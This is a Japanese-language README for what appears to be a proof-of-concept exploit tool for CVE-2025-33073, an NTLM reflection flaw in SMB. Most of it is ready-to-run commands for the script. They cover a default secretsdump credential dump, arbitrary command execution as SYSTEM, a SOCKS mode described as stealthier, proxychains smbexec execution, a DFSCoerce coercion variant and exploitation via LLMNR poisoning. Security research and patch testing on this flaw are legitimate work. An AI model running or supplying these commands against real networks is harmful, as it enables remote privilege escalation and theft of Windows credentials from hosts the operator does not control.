
NTLMリフレクションSMB脆弱性のPoCエクスプロイト
NTLM リフレクション SMB 脆弱性の PoC エクスプロイト。
すべてのクレジットは公式研究に帰属します:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (ほとんどのパッケージがプリインストールされています)。
このツールは自動的に仮想環境を使用します。セットアップするには、次を実行します:
./setup.sh
これにより仮想環境が作成され、ldap3-bleeding-edge==2.10.1.1337 を含むすべての必要な依存関係がインストールされます。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
カスタムコマンド
secretsdump を実行する代わりに、カスタムコマンドを実行できます。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
SYSTEM として有効な接続が確立された後、よりステルスにコマンドを実行するため。ここでは --target と --target-ip を同じにする必要があります。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
SAM をダンプする代わりに、proxychains 経由でカスタムコマンドを実行することもできます。
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

SMB 署名が有効な場合にリフレクションが本当に機能しないかどうかを調査した結果、パケットから SIGN/SEAL が削除された場合に、通常は MIC のために不可能な SMB から LDAPS へのリレーが可能になるバグが見つかりました。
謝辞:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
デバイスと同じブロードキャストドメインにあり、LLMNR ポイズニングに対して脆弱な場合、DNS レコードを登録せずにデバイスを悪用できます。

ローカル NTLM 認証が行われる

ローカル NTLM 認証が行われず、FAILED 試行になる

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073